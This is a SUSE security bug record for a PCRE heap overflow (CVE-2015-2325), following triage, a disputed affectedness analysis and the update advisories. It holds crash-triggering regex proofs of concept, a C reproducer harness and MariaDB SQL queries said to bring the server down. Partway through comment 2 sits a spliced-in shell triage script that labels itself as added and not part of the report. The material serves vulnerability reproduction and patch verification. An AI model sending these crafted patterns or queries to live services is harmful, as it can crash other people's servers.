Bug 924960 - (CVE-2015-2325) VUL-0: CVE-2015-2325: pcre: heap buffer overflow in compile_branch()
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Component: Incidents
Version: unspecified
Hardware: Other
OS: openSUSE 13.2
Priority: P3 - Medium
Severity: Major
Target Milestone: ---
Assigned To: Security Team bot
Security Team bot
URL: https://smash.suse.de/issue/115321/
Whiteboard: maint:running:61428:important CVSSv2...
Depends on:
Blocks:
Reported: 2015-03-30 14:14 UTC by Marcus Meissner
Modified: 2020-03-27 17:07 UTC (History)
CC List: 10 users

See Also:
Found By: Security Response Team
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Description Marcus Meissner 2015-03-30 14:14:11 UTC
rh#1207198

A flaw was found in the PCRE library:

The PCRE library is prone to a heap overflow vulnerability. Due to insufficient bounds checking inside compile_branch(), heap memory could be overflowed via a crafted regular expression. Since the PCRE library is widely used, this vulnerability should affect many applications using it. An attacker may exploit this issue to execute arbitrary code in the context of the user running the affected application.

Upstream issue:

http://bugs.exim.org/show_bug.cgi?id=1591

Upstream patch:

http://vcs.pcre.org/viewvc?revision=1528&view=revision


References:
https://bugzilla.redhat.com/show_bug.cgi?id=1207198
Comment 1 Swamp Workflow Management 2015-03-30 22:01:53 UTC
bugbot adjusting priority
Comment 2 Andreas Stieger 2015-04-07 15:04:10 UTC
Reproducer from http://bugs.exim.org/show_bug.cgi?id=1591

"((?2){0,1999}?(b(?2)c)){0,2}"

The simplest PoC is "((?2){0,1999}())?"

To reproduce the issue, you could use the following C code:

#define PCRE_STATIC
#include "pcre.h"
#include <stdio.h>
#include <string.h>

#define OVECCOUNT 30

int main(int argc, char* argv[])
{
        pcre *re;
        const char *error;
        int erroffset;
        int ovector[OVECCOUNT];
        int rc;
        if (argc != 3){
                printf("Two arguments required: a regex and a subject string.\n");
                return -1;
        }
        re = pcre_compile(argv[1], 0, &error, &erroffset, NULL);
        if (re == NULL){
                printf("PCRE compilation failed at offset %d: %s.\n",erroffset,error);
                /* no return here: execution falls through to pcre_exec() with
                   re == NULL, which yields PCRE_ERROR_NULL (-2); that is the
                   "Matching error -2" line reported in comment 7 */
        }
        rc = pcre_exec(re, NULL, argv[2], (int)strlen(argv[2]), 0, 0, ovector, OVECCOUNT);
        if (rc < 0){
                switch (rc){
                case PCRE_ERROR_NOMATCH:printf("No match.\n"); break;
                default: printf("Matching error %d.\n", rc); break;
                }
                return -1;
        }
        return 0;
}

Compile it as main.exe, then run it as follows. 

main.exe "((?2){0,1999}())?" AAAAAAAAA
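The following triage script is an added example and is not part of this bug report or of PCRE; it builds the harness from comment 2 under AddressSanitizer and runs both PoC patterns against it, mapping the harness's exit status to a one-word verdict so that a failed compile (the "internal error ... subpattern not found" result comment 7 reports on 8.33, which exits via the harness's `return -1`) is told apart from an actual heap corruption (SIGABRT/SIGSEGV). The file name `poc.c`, the function names `classify_status`, `build_harness` and `run_poc`, the `run` subcommand, and the reliance on `pcre-config` and an ASan-capable `cc` are all assumptions of this example.

```shell
#!/bin/sh
# Added triage helper (example code, not from the bug or from PCRE): builds the
# harness posted in comment 2 under AddressSanitizer and runs the PoC patterns.
# Assumptions: the harness is saved as poc.c in the current directory,
# `cc` supports -fsanitize=address, and `pcre-config` is on PATH.
set -u

# Constructed list of the two patterns quoted in comment 2, one per line.
POC_PATTERNS='((?2){0,1999}())?
((?2){0,1999}?(b(?2)c)){0,2}'
SUBJECT=AAAAAAAAA

# classify_status STATUS: map the harness's shell exit status to a verdict.
# 255 is what the harness's `return -1` becomes (failed compile or no match;
# its stdout line says which). 134 and 139 are 128+SIGABRT and 128+SIGSEGV,
# where a heap overflow lands under ASan with abort_on_error=1 or under plain
# glibc heap checking. 1 is ASan's default exit code when abort is disabled.
classify_status() {
    case "$1" in
        0)   echo match-ok ;;
        255) echo harness-error ;;
        1)   echo sanitizer-report ;;
        134) echo crash-abort ;;
        139) echo crash-segv ;;
        *)   echo "exit-$1" ;;
    esac
}

# build_harness SRC OUT: compile SRC with ASan; fails if pcre-config is missing.
build_harness() {
    command -v pcre-config >/dev/null 2>&1 || return 1
    # shellcheck disable=SC2046
    cc -g -O0 -fsanitize=address -fno-omit-frame-pointer \
        $(pcre-config --cflags) "$1" -o "$2" $(pcre-config --libs)
}

# run_poc BIN PATTERN: run one pattern, print "verdict<TAB>pattern", then the
# harness's own output (PCRE message or ASan report) indented beneath it.
run_poc() {
    out=$(ASAN_OPTIONS=abort_on_error=1 "$1" "$2" "$SUBJECT" 2>&1)
    status=$?
    printf '%s\t%s\n' "$(classify_status "$status")" "$2"
    [ -n "$out" ] && printf '%s\n' "$out" | sed 's/^/    /'
    return 0
}

main() {
    bin=$1
    build_harness poc.c "$bin" || {
        echo "cannot build harness (pcre-config or ASan missing?)" >&2
        exit 2
    }
    printf '%s\n' "$POC_PATTERNS" | while IFS= read -r pat; do
        run_poc "$bin" "$pat"
    done
}

# Usage: sh poc-triage.sh run [./poc]
# Only the explicit `run` subcommand drives the harness; sourcing the file for
# its functions, or running it without arguments, does nothing.
if [ "${1:-}" = run ]; then main "${2:-./poc}"; fi
```

A `harness-error` verdict whose captured line is the "internal error: previously-checked referenced subpattern not found" message is the comment 7 outcome (pcre_compile rejects the pattern, then pcre_exec returns -2 on the NULL handle); `crash-abort` or `crash-segv` with an ASan heap-buffer-overflow report beneath it is the behaviour the advisory describes, and `match-ok` is what a build carrying upstream r1528 should produce.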
Comment 3 Swamp Workflow Management 2015-04-07 15:11:44 UTC
An update workflow for this issue was started.
This issue was rated as important.
Please submit fixed packages until 2015-04-14.
When done, reassign the bug to security-team@suse.de.
https://swamp.suse.de/webswamp/wf/61428
Comment 4 Benjamin Brunner 2015-04-21 14:02:15 UTC
Stephan, any news here? The due date for submission was 2015-04-14.

Thanks in advance.
Comment 5 Stephan Kulow 2015-04-22 13:14:16 UTC
No news here. 04-14 was during hackweek and this week I'm busy with other things
Comment 6 Stephan Kulow 2015-04-24 08:24:28 UTC
So: the code in question changed heavily between 8.32, 8.33 and 8.36, and RH closed their bug as WONTFIX. If you insist, I can surely spend a week trying to understand how pcre works, but as I'm seeing this code for the first time, the chances I will break things are much higher than me fixing things ;(
Comment 7 Stephan Kulow 2015-04-24 08:33:07 UTC
The reproducer from #2 says:

PCRE compilation failed at offset 17: internal error: previously-checked referenced subpattern not found.
Matching error -2.

I assume this is INVALID for us too - 8.33 just doesn't have the code that is supposed to be affected
Comment 8 Stephan Kulow 2015-04-24 09:22:48 UTC
according to my analysis (and kind of RH's) this does not affect SLE-12 but is a side effect of refactoring that happened between 8.33 and 8.36
Comment 9 Andreas Stieger 2015-04-30 14:43:09 UTC
Thanks for the thorough analysis. Moving to openSUSE, assigning to bugowner in Base:System/pcre.
Comment 11 Andreas Stieger 2015-04-30 15:07:23 UTC
Right, noted. Taking back to security team, adding recent version updaters, including community.
Comment 13 Swamp Workflow Management 2015-05-12 15:06:58 UTC
openSUSE-SU-2015:0858-1: An update that fixes three vulnerabilities is now available.

Category: security (moderate)
Bug References: 906574,924960,924961
CVE References: CVE-2014-8964,CVE-2015-2325,CVE-2015-2326
Sources used:
openSUSE 13.2 (src):    pcre-8.37-3.5.1
openSUSE 13.1 (src):    pcre-8.37-2.4.1
Comment 14 Viktor Kijasev 2015-07-09 15:21:55 UTC
For MariaDB
https://mariadb.com/kb/en/mariadb/security/

CVE-2015-2325: MariaDB 10.0.18 

Fixes for the following security vulnerabilities:

    CVE-2014-8964 / CVE-2015-2325 / CVE-2015-2326 bundled PCRE contained heap-based buffer overflow vulnerability that allowed the server to crash or have other unspecified impact via a crafted regular expression made possible with the REGEXP_SUBSTR function (MDEV-8006). 

https://mariadb.atlassian.net/browse/MDEV-8006

Proof of Concept/How to Reproduce:
To reproduce the first issue, you can use mysql to access a remote MariaDB server (for example, "mysql -uroot -p") and do the following database operation:

    SELECT REGEXP_SUBSTR('ABC','(?i)((?2){0,1999}?(())|A)*');

To reproduce the second issue, do the following database operation:

    SELECT REGEXP_SUBSTR('ABC','((?+1)()){222,}+');

It brings the MariaDB Server down. And some screenshots are attached.

Note: The repro of these two issues may be unstable, sometimes you need to try it many times.
Comment 15 Swamp Workflow Management 2015-07-21 14:09:32 UTC
SUSE-SU-2015:1273-1: An update that solves 12 vulnerabilities and has one errata is now available.

Category: security (important)
Bug References: 906574,919053,919062,920865,920896,921333,924663,924960,924961,934789,936407,936408,936409
CVE References: CVE-2014-8964,CVE-2015-0433,CVE-2015-0441,CVE-2015-0499,CVE-2015-0501,CVE-2015-0505,CVE-2015-2325,CVE-2015-2326,CVE-2015-2568,CVE-2015-2571,CVE-2015-2573,CVE-2015-3152
Sources used:
SUSE Linux Enterprise Workstation Extension 12 (src):    mariadb-10.0.20-18.1
SUSE Linux Enterprise Software Development Kit 12 (src):    mariadb-10.0.20-18.1
SUSE Linux Enterprise Server 12 (src):    mariadb-10.0.20-18.1
SUSE Linux Enterprise Desktop 12 (src):    mariadb-10.0.20-18.1
Comment 17 Swamp Workflow Management 2016-12-02 15:08:05 UTC
SUSE-SU-2016:2971-1: An update that fixes 25 vulnerabilities is now available.

Category: security (moderate)
Bug References: 906574,924960,933288,933878,936227,942865,957566,957567,957598,957600,960837,971741,972127
CVE References: CVE-2014-8964,CVE-2015-2325,CVE-2015-2327,CVE-2015-2328,CVE-2015-3210,CVE-2015-3217,CVE-2015-5073,CVE-2015-8380,CVE-2015-8381,CVE-2015-8382,CVE-2015-8383,CVE-2015-8384,CVE-2015-8385,CVE-2015-8386,CVE-2015-8387,CVE-2015-8388,CVE-2015-8389,CVE-2015-8390,CVE-2015-8391,CVE-2015-8392,CVE-2015-8393,CVE-2015-8394,CVE-2015-8395,CVE-2016-1283,CVE-2016-3191
Sources used:
SUSE Linux Enterprise Workstation Extension 12-SP2 (src):    pcre-8.39-5.1
SUSE Linux Enterprise Workstation Extension 12-SP1 (src):    pcre-8.39-5.1
SUSE Linux Enterprise Software Development Kit 12-SP2 (src):    pcre-8.39-5.1
SUSE Linux Enterprise Software Development Kit 12-SP1 (src):    pcre-8.39-5.1
SUSE Linux Enterprise Server for Raspberry Pi 12-SP2 (src):    pcre-8.39-5.1
SUSE Linux Enterprise Server 12-SP2 (src):    pcre-8.39-5.1
SUSE Linux Enterprise Server 12-SP1 (src):    pcre-8.39-5.1
SUSE Linux Enterprise High Availability 12-SP2 (src):    pcre-8.39-5.1
SUSE Linux Enterprise High Availability 12-SP1 (src):    pcre-8.39-5.1
SUSE Linux Enterprise Desktop 12-SP2 (src):    pcre-8.39-5.1
SUSE Linux Enterprise Desktop 12-SP1 (src):    pcre-8.39-5.1
Comment 18 Swamp Workflow Management 2016-12-12 18:11:48 UTC
openSUSE-SU-2016:3099-1: An update that fixes 25 vulnerabilities is now available.

Category: security (moderate)
Bug References: 906574,924960,933288,933878,936227,942865,957566,957567,957598,957600,960837,971741,972127
CVE References: CVE-2014-8964,CVE-2015-2325,CVE-2015-2327,CVE-2015-2328,CVE-2015-3210,CVE-2015-3217,CVE-2015-5073,CVE-2015-8380,CVE-2015-8381,CVE-2015-8382,CVE-2015-8383,CVE-2015-8384,CVE-2015-8385,CVE-2015-8386,CVE-2015-8387,CVE-2015-8388,CVE-2015-8389,CVE-2015-8390,CVE-2015-8391,CVE-2015-8392,CVE-2015-8393,CVE-2015-8394,CVE-2015-8395,CVE-2016-1283,CVE-2016-3191
Sources used:
openSUSE Leap 42.2 (src):    pcre-8.39-6.1
openSUSE Leap 42.1 (src):    pcre-8.39-5.1
Comment 19 Swamp Workflow Management 2016-12-15 15:07:51 UTC
SUSE-SU-2016:3161-1: An update that fixes 25 vulnerabilities is now available.

Category: security (moderate)
Bug References: 906574,924960,933288,933878,936227,942865,957566,957567,957598,957600,960837,971741,972127
CVE References: CVE-2014-8964,CVE-2015-2325,CVE-2015-2327,CVE-2015-2328,CVE-2015-3210,CVE-2015-3217,CVE-2015-5073,CVE-2015-8380,CVE-2015-8381,CVE-2015-8382,CVE-2015-8383,CVE-2015-8384,CVE-2015-8385,CVE-2015-8386,CVE-2015-8387,CVE-2015-8388,CVE-2015-8389,CVE-2015-8390,CVE-2015-8391,CVE-2015-8392,CVE-2015-8393,CVE-2015-8394,CVE-2015-8395,CVE-2016-1283,CVE-2016-3191
Sources used:
SUSE Linux Enterprise Workstation Extension 12-SP2 (src):    pcre-8.39-7.1
SUSE Linux Enterprise Workstation Extension 12-SP1 (src):    pcre-8.39-7.1
SUSE Linux Enterprise Software Development Kit 12-SP2 (src):    pcre-8.39-7.1
SUSE Linux Enterprise Software Development Kit 12-SP1 (src):    pcre-8.39-7.1
SUSE Linux Enterprise Server for SAP 12 (src):    pcre-8.39-7.1
SUSE Linux Enterprise Server for Raspberry Pi 12-SP2 (src):    pcre-8.39-7.1
SUSE Linux Enterprise Server 12-SP2 (src):    pcre-8.39-7.1
SUSE Linux Enterprise Server 12-SP1 (src):    pcre-8.39-7.1
SUSE Linux Enterprise Server 12-LTSS (src):    pcre-8.39-7.1
SUSE Linux Enterprise High Availability 12-SP2 (src):    pcre-8.39-7.1
SUSE Linux Enterprise High Availability 12-SP1 (src):    pcre-8.39-7.1
SUSE Linux Enterprise Desktop 12-SP2 (src):    pcre-8.39-7.1
SUSE Linux Enterprise Desktop 12-SP1 (src):    pcre-8.39-7.1
Comment 20 Marcus Meissner 2016-12-18 19:50:48 UTC
done
Comment 21 Swamp Workflow Management 2018-12-03 18:20:55 UTC
This is an autogenerated message for OBS integration:
This bug (924960) was mentioned in
https://build.opensuse.org/request/show/653587 Backports:SLE-12 / pcre2